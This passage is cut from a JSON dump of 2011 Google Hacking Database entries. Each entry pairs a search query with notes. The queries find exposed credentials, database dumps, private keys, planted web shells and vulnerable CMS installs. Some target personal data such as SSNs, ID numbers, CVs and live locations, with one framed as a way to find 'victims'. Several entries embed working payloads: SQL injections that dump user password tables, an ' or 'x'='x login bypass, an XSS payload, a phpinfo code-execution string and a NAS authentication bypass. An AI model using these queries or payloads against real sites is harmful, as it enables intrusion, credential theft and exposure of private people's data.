is that was patched.Author: DigiP", "submited": "2011-01-09", "request": "allintext:\"fs-admin.php\"", "id": 3668}, {"short description": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "long description": "Google search for web site build with symfony framework. This filecontains the login / password for the databasesAuthor: Simon Leblanc", "submited": "2011-01-09", "request": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "id": 3669}, {"short description": "inurl:web/frontend_dev.php -trunk", "long description": "Google search for web site build with symfony framework and indevelopment environment.In most case, you have a bar development on top of the web page. If yougo in config -&gt; Settings, you can find login and password.if you replace web/frontend_dev.php by config/databases.yml in url, youcan find login / password for the databasesAuthor: Simon Leblanc", "submited": "2011-01-09", "request": "inurl:web/frontend_dev.php -trunk", "id": 3670}, {"short description": "\"TinyBB 2011 all rights reserved\"", "long description": "Submitter: Aodrulez    SQL Injection:  http://www.exploit-db.com/exploits/15961/", "submited": "2011-01-10", "request": "\"TinyBB 2011 all rights reserved\"", "id": 3671}, {"short description": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "long description": "Maximus CMS (FCKeditor) File Upload Vulnerabilityhttp://www.exploit-db.com/exploits/15960Author: eidelweiss", "submited": "2011-01-11", "request": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "id": 3672}, {"short description": "intext:\"Powered by DZOIC Handshakes Professional\"", "long description": "Author: IR-Security -TeamSQL injection: http://server/administrator/index.php?section=manage_members&amp;action=edit_photo&amp;pho_id=-100001 unionall select 1,version()--", "submited": "2011-01-20", "request": "intext:\"Powered by DZOIC Handshakes Professional\"", "id": 3675}, {"short description": "inurl:\"index.php?m=content+c=rss+catid=10\"", "long description": "Author: eidelweiss http://host/index.php?m=content&amp;c=rss&amp;catid=5\tshow MySQL Error (table)", "submited": "2011-01-21", "request": "inurl:\"index.php?m=content+c=rss+catid=10\"", "id": 3676}, {"short description": "\"inurl:cultbooking.php\"", "long description": "CultBooking Multiple Vulnerabilities:  http://www.exploit-db.com/exploits/16028/", "submited": "2011-01-22", "request": "\"inurl:cultbooking.php\"", "id": 3677}, {"short description": "inurl:\"/plugins/ImageManager/manager.php\"", "long description": "Author: PenetraDz  Shell Upload Vuln:  manager/media/editor/plugins/ImageManager/manager.php", "submited": "2011-01-22", "request": "inurl:\"/plugins/ImageManager/manager.php\"", "id": 3678}, {"short description": "\"Powered by: PHP Link Directory\"", "long description": "CSRF Vuln:  http://www.exploit-db.com/exploits/16037/", "submited": "2011-01-23", "request": "\"Powered by: PHP Link Directory\"", "id": 3679}, {"short description": "inurl:\"ab_fct.php?fct=\"", "long description": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16044", "submited": "2011-01-25", "request": "inurl:\"ab_fct.php?fct=\"", "id": 3680}, {"short description": "Photo Gallery powered by TinyWebGallery 1.8.3", "long description": "Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: http://www.exploit-db.com/exploits/16090", "submited": "2011-02-01", "request": "Photo Gallery powered by TinyWebGallery 1.8.3", "id": 3681}, {"short description": ":inurl:mj_wwwusr", "long description": "http://www.exploit-db.com/exploits/16103", "submited": "2011-02-03", "request": "http://www.google.com/#sclient=psy&amp;hl=en&amp;safe=off&amp;site=&amp;source=hp&amp;q=:inurl%3Amj_wwwusr&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;pbx=1&amp;fp=2dcb6979649afcb0", "id": 3682}, {"short description": "allintext: /qcodo/_devtools/codegen.php", "long description": "Information Disclosure: http://www.exploit-db.com/exploits/16116", "submited": "2011-02-05", "request": "allintext: /qcodo/_devtools/codegen.php", "id": 3683}, {"short description": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "long description": "SQL Injection:  http://www.exploit-db.com/exploits/16122", "submited": "2011-02-06", "request": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "id": 3684}, {"short description": "site:ebay.com inurl:callback", "long description": "Returns:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?then:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3ECan also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters", "submited": "2011-02-11", "request": "site:ebay.com inurl:callback", "id": 3685}, {"short description": "inurl:app/etc/local.xml", "long description": "Magento local.xml sensitive information disclosureAuthor: Rambaud Pierre", "submited": "2011-02-19", "request": "inurl:app/etc/local.xml", "id": 3686}, {"short description": "\"made visual by sightFACTORY\"", "long description": "Author : eXeSoul   [#] http://server/accommodations.php?contentid=[sqli]   [#] http://server/chamber_business.php?mid=[sqli]   [#] http://server/work.php?mid=[sqli]     [#] http://server/members.php?id=[SQLi]", "submited": "2011-02-23", "request": "\"made visual by sightFACTORY\"", "id": 3687}, {"short description": "\"powered by zipbox media\"", "long description": "Author:XaDaL   http://site.com/album.php?id=[SQLi]", "submited": "2011-02-23", "request": "\"powered by zipbox media\"", "id": 3688}, {"short description": "intext:db_pass inurl:settings.ini", "long description": "Submitter: Bastich  mysql.nimbit.com dashboard settings", "submited": "2011-02-24", "request": "intext:db_pass inurl:settings.ini", "id": 3689}, {"short description": "intitle:cyber anarchy shell", "long description": "Submitter: eXeSoul   cyber anarchy shell", "submited": "2011-02-24", "request": "intitle:cyber anarchy shell", "id": 3690}, {"short description": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "long description": "Author :- eXeSoulYou will get lots of web shells even some  private shells.", "submited": "2011-02-24", "request": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "id": 3691}, {"short description": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "long description": "Author : AtT4CKxT3rR0r1STSQL Injection: www.site.com/album.php?id=null[Sql]", "submited": "2011-03-05", "request": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "id": 3692}, {"short description": "\"Powered by SOFTMAN\"", "long description": "Author: eXeSoul[i]   \"Powered by SOFTMAN\"[ii]  \"Powered by Softman Multitech Pvt Ltd\"[iii] \"All Rights reserved by SOFTMAN\"Go To Admin Panel :-Admin: ' or 'x'='x  Password: ' or 'x'='x", "submited": "2011-03-07", "request": "\"Powered by SOFTMAN\"", "id": 3693}, {"short description": "intext:\"Web Design by Webz\" filetype:asp", "long description": "Submitter: p0pc0rnhttp://site.com/xxx.asp?id=[SQL]http://site.com/xxx.asp?catID=[SQL]http://site.com/xxx.asp?brandID=[SQL]", "submited": "2011-03-08", "request": "intext:\"Web Design by Webz\" filetype:asp", "id": 3694}, {"short description": "intext:\"Powered by EZPub\"", "long description": "SQL Injection: http://www.exploit-db.com/exploits/16941", "submited": "2011-03-08", "request": "intext:\"Powered by EZPub\"", "id": 3695}, {"short description": "inurl:\"sitegenius/topic.php\"", "long description": "Submitter: dR.sqL  SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]", "submited": "2011-03-13", "request": "inurl:\"sitegenius/topic.php\"", "id": 3696}, {"short description": "\"POWERED BY LOG1 CMS\"", "long description": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16969/", "submited": "2011-03-14", "request": "\"POWERED BY LOG1 CMS\"", "id": 3697}, {"short description": "ADAN (view.php ) Sql Injection Vulnerability", "long description": "SQL Injection: http://www.exploit-db.com/exploits/16276/", "submited": "2011-03-14", "request": "ADAN (view.php ) Sql Injection Vulnerability", "id": 3698}, {"short description": "intitle:\"cascade server\" inurl:login.act", "long description": "Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton", "submited": "2011-03-15", "request": "intitle:\"cascade server\" inurl:login.act", "id": 3699}, {"short description": "intext:\"Site by Triware Technologies Inc\"", "long description": "Submitter: p0pc0rnSQL Injection: http://site.com/default.asp?com=[Page]&amp;id=[SQL]&amp;m=[id]    http://site.com/default.asp?com=[Page]&amp;id=[id]&amp;m=[SQL]", "submited": "2011-03-16", "request": "intext:\"Site by Triware Technologies Inc\"", "id": 3700}, {"short description": "intext:\"Powered by VoiceCMS\"", "long description": "Submitter: p0pc0rn   SQL Injection:  http://site.com/default.asp?com=[Page]&amp;id=[SQL]&amp;m=[id]    http://site.com/default.asp?com=[Page]&amp;id=[id]&amp;m=[SQL]", "submited": "2011-03-16", "request": "intext:\"Powered by VoiceCMS\"", "id": 3701}, {"short description": "intext:\"Powered by OnePlug CMS\"", "long description": "Sumitter: p0pc0rnSQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a", "submited": "2011-03-16", "request": "intext:\"Powered by OnePlug CMS\"", "id": 3702}, {"short description": "intitle:\"[EasyPHP] - Administration\"", "long description": "Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)", "submited": "2011-03-23", "request": "intitle:\"[EasyPHP] - Administration\"", "id": 3703}, {"short description": "intext:\"Powered by Inventory Mojo Software.\"", "long description": "Submitter: p0pc0rnSQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp)---http://site.com/categoria.asp?CT=6' and '1'='1 TRUE         http://site.com/categoria.asp?CT=6' and '1'='0 FALSE", "submited": "2011-03-23", "request": "intext:\"Powered by Inventory Mojo Software.\"", "id": 3704}, {"short description": "\"site by Designscope\"", "long description": "Submitter: Net.Edit0rSQL Injection:  http://127.0.0.1/general.php?pageID=[SQL]    http://127.0.0.1/content.php?pageID=[SQL]", "submited": "2011-03-24", "request": "\"site by Designscope\"", "id": 3705}, {"short description": "index.php?option=com_ignitegallery", "long description": "Submitter: TiGeR_YeMeN HaCkErSQL Injection:  index.php?option=com_ignitegallery&amp;task=view&amp;gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--", "submited": "2011-03-27", "request": "index.php?option=com_ignitegallery", "id": 3706}, {"short description": "intext:\"Powered by FXRecruiter\"", "long description": "Submitter:  Ashiyane Digital Security TeamArbitrary File Upload: You must Register at site, Then in \"Upload CV Field\" Select and Upload Your File, then Using \"Live Http Header\" Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]", "submited": "2011-03-27", "request": "intext:\"Powered by FXRecruiter\"", "id": 3707}, {"short description": "inurl:\"fbconnect_action=myhome\"", "long description": "Submitter: z0mbyakSQL Injection:  www.site.name/path/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--", "submited": "2011-04-05", "request": "inurl:\"fbconnect_action=myhome\"", "id": 3708}, {"short description": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "long description": "full details dbname dbuser dbpass all plain textAuthor:Bastich", "submited": "2011-04-18", "request": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "id": 3709}, {"short description": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "long description": "Unreal Tournament config, plain text passwords Author: Bastich", "submited": "2011-04-18", "request": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "id": 3710}, {"short description": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "long description": "plain text passwods", "submited": "2011-04-18", "request": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "id": 3711}, {"short description": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "long description": "Total commander wxc_ftp.ini run has through John etc. or even better usehttp://wcxftp.org.ru/", "submited": "2011-04-18", "request": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "id": 3712}, {"short description": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "long description": "Asian FTP software -, run the password hash through John etc. Author: Bastich", "submited": "2011-04-18", "request": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "id": 3713}, {"short description": "\"error_log\" inurl:/wp-content", "long description": "Find various www readable Wordpress directories containing error logs withserver side debugging info, such as home path directory names, which areoften the same user names for logging into the server over FTP and SSH.This often exposes the path of the plug-ins installed in wordpress as well,giving someone more information and avenues of attack since many Wordpressplug-ins can lead to compromises of the sites security. - DigiP", "submited": "2011-05-03", "request": "\"error_log\" inurl:/wp-content", "id": 3714}, {"short description": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "long description": "Site: google.com/latitude - This is a free application where you can trackyour PC, laptop and mobile, just login there and you will be trackedfreely(used to track yourself live and you can put this in blogs to showwhere you are)I made a dork simply that shows some couple of people, after some years whenthis application will grow stronger and you can get tons of victims.*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*By *The ALLSTAR*", "submited": "2011-05-03", "request": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "id": 3715}, {"short description": "intitle:Locus7shell intext:\"Software:\"", "long description": "intitle:Locus7shell intext:\"Software:\"Submitted by lionaneesh--ThanksAneesh Dogra (lionaneesh)", "submited": "2011-05-03", "request": "intitle:Locus7shell intext:\"Software:\"", "id": 3716}, {"short description": "filetype:xls + password + inurl:.com", "long description": "The filetype:xls never changesWhat is inbtween then + sings can be what ever you are looking fortaxidssnpasswordStudent IDetcThe inurl: can be changed to what you want.gov.edu.cometc.Take care,RedShift", "submited": "2011-05-03", "request": "filetype:xls + password + inurl:.com", "id": 3717}, {"short description": "\"Login Name\" Repository Webtop intitle:login", "long description": "Search for login screen of default instance: Documentum Webtop by EMC", "submited": "2011-05-11", "request": "\"Login Name\" Repository Webtop intitle:login", "id": 3718}, {"short description": "intitle:\"Enabling Self-Service Procurement\"", "long description": "Search for login screen of default instance: Puridiom (A Procurement WebApplication)", "submited": "2011-05-11", "request": "intitle:\"Enabling Self-Service Procurement\"", "id": 3719}, {"short description": "intitle:\"cyber recruiter\" \"User ID\"", "long description": "Search for login screen of default instance: Cyber Recruiter (applicanttracking and recruiting software)", "submited": "2011-05-11", "request": "intitle:\"cyber recruiter\" \"User ID\"", "id": 3720}, {"short description": "inurl:sarg inurl:siteuser.html", "long description": "Submitter: pipefishSquid User Access Reports that show users' browsing history throughthe proxy.  Shows internal IP space sometimes, usernames as well, and canbe helpful when planning a pen test (spear phishing\\social engineeringcampaign etc.)  It also helps to ID an organization's proxy server.", "submited": "2011-05-26", "request": "inurl:sarg inurl:siteuser.html", "id": 3721}, {"short description": "vBulletin Install Page Detection", "long description": "inurl:/install/install.php intitle:vBulletin * Install SystemThis dork displays the untreated install.php pages!Auth0r: lionaneeshGreetz to :Team Indishell , INDIA , Aasim Shaikh ,", "submited": "2011-05-27", "request": "vBulletin Install Page Detection", "id": 3722}, {"short description": "ionCube Loader Wizard information disclosure", "long description": "inurl:loader-wizard ext:phpThis dork displays sensitive informationAuth0r: MaXe", "submited": "2011-05-28", "request": "ionCube Loader Wizard information disclosure", "id": 3723}, {"short description": "inurl:\"clsUploadtest.asp\"", "long description": "Submitter:  KDGCrewhttp://www.site.com/clsUpload/clsUploadtest.asphttp://www.site.com/clsUpload/nameshell.php", "submited": "2011-06-14", "request": "inurl:\"clsUploadtest.asp\"", "id": 3724}, {"short description": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "long description": "PostgreSQL database dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "id": 3725}, {"short description": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "long description": "MySQL database dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "id": 3726}, {"short description": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "long description": "phpMyAdmin SQL dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "id": 3727}, {"short description": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "long description": "Searches Dropbox for publicly avaliable PDF's containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack.Author: Trevor Starick", "submited": "2011-07-01", "request": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "id": 3728}, {"short description": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "long description": "Searches GoogleDocs for publicly avaliable PDF's containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack.--Trevor Starick", "submited": "2011-07-18", "request": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "id": 3729}, {"short description": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "long description": "Searches Mediafire for publicly avaliable PDF's containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack--Trevor Starick", "submited": "2011-07-18", "request": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "id": 3730}, {"short description": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "long description": "Searches StashBox for publicly avaliable PDF's or .doc filescontaining information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack--Trevor Starick", "submited": "2011-07-18", "request": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "id": 3731}, {"short description": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "long description": "iphone apple push notification system private keys, frequently unencrypted,frequently with DeviceIDs in same dir", "submited": "2011-07-18", "request": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "id": 3732}, {"short description": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "long description": "Juicy information about the apache server installation in the website.--*Regards,Fady Mohammed Osman.*", "submited": "2011-07-26", "request": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "id": 3733}, {"short description": "inurl:\":9000\" PacketVideo corporation", "long description": "inurl:\":9000\" PacketVideo corporationAbout: This provides Twonky Server Media interface. You can find images, music, videos etc.Submitter: Ishaan P", "submited": "2011-07-26", "request": "inurl:\":9000\" PacketVideo corporation", "id": 3734}, {"short description": "intitle:m1n1 1.01", "long description": "find the b374k shell....Submitted by : biLLbud", "submited": "2011-07-26", "request": "intitle:m1n1 1.01", "id": 3735}, {"short description": "filetype:pem \"Microsoft\"", "long description": "Microsoft private keys, frequently used for servers with UserID on the samepage.--Shamanoid", "submited": "2011-07-26", "request": "filetype:pem \"Microsoft\"", "id": 3736}, {"short description": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "long description": "vtiger CRM version 5.x presence--LiquidWorm", "submited": "2011-08-06", "request": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "id": 3737}, {"short description": "allinurl:forcedownload.php?file=", "long description": "Didn't see this anywhere in the GHDB, but its been known for a while andwidely abused by others.Google Dork \"allinurl:forcedownload.php?file=\"Sites that use the forcedownload.php script are vulnerable to urlmanipulation, and will spit out any file on the local site, including thePHP files themselves with all server side code, not the rendered page, butthe source itself. This is most commonly used on wordpress sites to grab thewp-config.php file to gain access to the database, but is not limited towordpress sites. I only list it as an example, so people understand theweight of flaw.- DigiP", "submited": "2011-08-25", "request": "allinurl:forcedownload.php?file=", "id": 3738}, {"short description": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "long description": "Zend application ini, with usernames, passwords and db infoloveBastich", "submited": "2011-08-25", "request": "filetype:ini \"Bootstrap.php\" (pass|passwd|password|pwd)", "id": 3739}, {"short description": "\"Powered by SLAED CMS\"", "long description": "Exploit Title: Slaed CMS Code execOn different versions of this software next vulnerabilities are availible:/index.php?name=Search&amp;mod=&amp;word={${phpinfo()}}&amp;query=ok&amp;to=view/index.php?name=Search&amp;mod=&amp;word=ok&amp;query={${phpinfo()}}&amp;to=viewOR:/search.html?mod=&amp;word={${phpinfo()}}&amp;query=ok&amp;to=view/search.html?mod=&amp;word=ok&amp;query={${phpinfo()}}&amp;to=view", "submited": "2011-09-12", "request": "\"Powered by SLAED CMS\"", "id": 3740}, {"short description": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "long description": "Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc", "submited": "2011-09-26", "request": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "id": 3741}, {"short description": "inurl:ftp \"password\" filetype:xls", "long description": "this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba", "submited": "2011-09-26", "request": "inurl:ftp \"password\" filetype:xls", "id": 3742}, {"short description": "inurl:view.php?board1_sn=", "long description": "locates a webapp vulnerable to SQL injection", "submited": "2011-09-26", "request": "inurl:view.php?board1_sn=", "id": 3743}, {"short description": "inurl:\"amfphp/browser/servicebrowser.swf\"", "long description": "AMFPHP service browser, debug interface. Author: syddd", "submited": "2011-09-26", "request": "inurl:\"amfphp/browser/servicebrowser.swf\"", "id": 3744}, {"short description": "intitle:#k4raeL - sh3LL", "long description": "intitle:#k4raeL - sh3LLFinds K4rael Shell , though many of them are dead but we can get some andeven cache data can get you information , making website vulnerableAuthor: cyb3r.pr3dat0r", "submited": "2011-10-11", "request": "intitle:#k4raeL - sh3LL", "id": 3745}, {"short description": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "long description": "Backup or temp versions of php files containing you guessed it passwords orother ripe for the picking info...Author: Bastich", "submited": "2011-10-11", "request": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "id": 3746}, {"short description": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "long description": "example google dork to find trace.axd, a file used for debugging asp thatreveals full http request details like cookie and other data that in manycases can be used to hijack user-sessions, display plain-textusernames/passwords and also serverinfo like pathnamessecond with plain-text usernames and passwords along with sessiondata. thisfile should be developer-only and not publicly available but seems to beused quite often, usually hidden from google with robots.txt. Author: easypwn", "submited": "2011-11-19", "request": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "id": 3747}, {"short description": "inurl:\"/includes/config.php\"", "long description": "The Dork Allows you to get data base information from config files. Author: XeNon", "submited": "2011-11-19", "request": "inurl:\"/includes/config.php\"", "id": 3748}, {"short description": "intitle:index.of? configuration.php.zip", "long description": "this dork finds mostly backed up configuration.php files.Its possible to change the *.zip to *.txt or other file types.Author: Lord.TMR", "submited": "2011-11-19", "request": "intitle:index.of? configuration.php.zip", "id": 3749}, {"short description": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "long description": "this dork locates files containing ftp passwords", "submited": "2011-11-19", "request": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "id": 3750}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "this dork locates registry dumps", "submited": "2011-11-19", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 3751}, {"short description": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "long description": "locates cpanel and ftp cracker. Author: alsa7r", "submited": "2011-11-19", "request": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "id": 3752}, {"short description": "inurl:/xampp", "long description": "this dork looks for servers with xampp installed", "submited": "2011-11-19", "request": "inurl:/xampp", "id": 3753}, {"short description": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "long description": "this dork locates backed up config filesfiletype:php~ (define)(DB_USER|DB_PASS|DB_NAME)filetype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)filetype:inc (define)(DB_USER|DB_PASS|DB_NAME)filetype:bak (define)(DB_USER|DB_PASS|DB_NAME)Author: Gerald J. Pottier III", "submited": "2011-11-24", "request": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "id": 3754}, {"short description": "filetype:old (mysql_connect) ()", "long description": "There are three of mysql_connects but that all search in .inc orwarnings, non search for .old . Dot old is something that all devs toto hide old files they do not want to delete immediatly but almostalways forget to delete. The server lang can be changed.:D--Gerald J. Pottier IIISenior Managed Systems Engineer :STG inc.Hereford, AZ 85615[Home] 520.843.0135[Work]  520.538.9684", "submited": "2011-11-24", "request": "filetype:old (mysql_connect) ()", "id": 3755}, {"short description": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "long description": "This search attempts to find the c99 backdoor that may be knowingly orunknowingly installed on servers. I have refined the search in hopes thatmore general talk about the backdoor, and also talk about the marijuanastrain does not pollute the results quite as much.Author: Teague Newman", "submited": "2011-11-24", "request": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "id": 3756}, {"short description": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "long description": "Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones", "submited": "2011-11-25", "request": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "id": 3757}, {"short description": "allintitle:\"UniMep Station Controller\"", "long description": "UniMep is a device for managing fuel station. You can see process offueling cars and you can make some changes in the setting.The default username/password is admin/setup. Author: WBR rigan", "submited": "2011-12-10", "request": "allintitle:\"UniMep Station Controller\"", "id": 3758}, {"short description": "inurl:/cgi-bin/makecgi-pro", "long description": "Brings up listings for Iomgea NAS devices.Password protected folders are susceptible to authentication bypass byadding the following to the url (after /cgi-bin/make-cgi-pro):?page_value=page_files&amp;tab_value=%20&amp;task_value=task_gotoPath&amp;param1_value=(foldername)Common folders are music, movies, photos &amp; public. Author: Matt Jones", "submited": "2011-12-12", "request": "inurl:/cgi-bin/makecgi-pro", "id": 3759}, {"short description": "\"My RoboForm Data\" \"index of\"", "long description": "This dork looks for Roboform password files. Author: Robert McCurdy", "submited": "2011-12-12", "request": "\"My RoboForm Data\" \"index of\"", "id": 3760}, {"short description": "filetype:sql inurl:wp-content/backup-*", "long description": "Search for WordPress MySQL database backup. Author: AngelParrot", "submited": "2011-12-14", "request": "filetype:sql inurl:wp-content/backup-*", "id": 3761}, {"short description": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "long description": "This dork locates social security numbers. Author: Luciano UNLP", "submited": "2011-12-16", "request": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "id": 3762}, {"short description": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "long description": "This dork locates Curriculum Vitale files. Author: Luciano UNLP", "submited": "2011-12-16", "request": "Google Dork inurl:Curriculum Vitale filetype:doc ( Vital Informaticon , Addres, Telephone Numer, SSN , Full Name, Work , etc ) In Spanish.", "id": 3763}, {"short description": "Microsoft-IIS/7.0 intitle:index.of name size", "long description": "IIS 7 directory listing. Author: huang", "submited": "2011-12-19", "request": "Microsoft-IIS/7.0 intitle:index.of name size", "id": 3764}, {"short description": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "long description": "This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP", "submited": "2011-12-19", "request": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "id": 3765}, {"short description": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "long description": "This search attempts to find the BOFF 1.0 Shell. Author: alsa7r", "submited": "2011-12-23", "request": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "id": 3766}, {"short description": "intitle:SpectraIV-IP", "long description": "Google dork for pelco SpectraIV-IP Dome Series camerasDefault username/password \"admin/admin\". Author: GhOsT-PR", "submited": "2011-12-26", "request": "intitle:SpectraIV-IP", "id": 3767}, {"short description": "\"Powered by kryCMS\"", "long description": "kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan", "submited": "2011-12-26", "request": "\"Powered by kryCMS\"", "id": 3768}, {"short description": "allintext:D.N.I filetype:xls", "long description": "This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !Author: Luciano UNLP", "submited": "2011-12-27", "request": "allintext:D.N.I filetype:xls", "id": 3769}, {"short description": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "long description": "Logged username, passwords, hashesAuthor: GhOsT-PR", "submited": "2011-12-27", "request": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "id": 3770}, {"short description": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "long description": "Gateway RoutersAuthor: GhOsT-PR", "submited": "2011-12-27", "request": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "id": 3771}, {"short description": "inurl:cgi-bin/cosmobdf.cgi?", "long description": "COSMOView for building management. Author: GhOsT-PR", "submited": "2011-12-28", "request": "inurl:cgi-bin/cosmobdf.cgi?", "id": 3772}, {"short description": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "long description": "DIY-CMS blog mod SQL Injection. Author: snup", "submited": "2011-12-29", "request": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "id": 3773}, {"short description": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "long description": "ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK", "submited": "2012-01-03", "request": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "id": 3774}, {"short description": 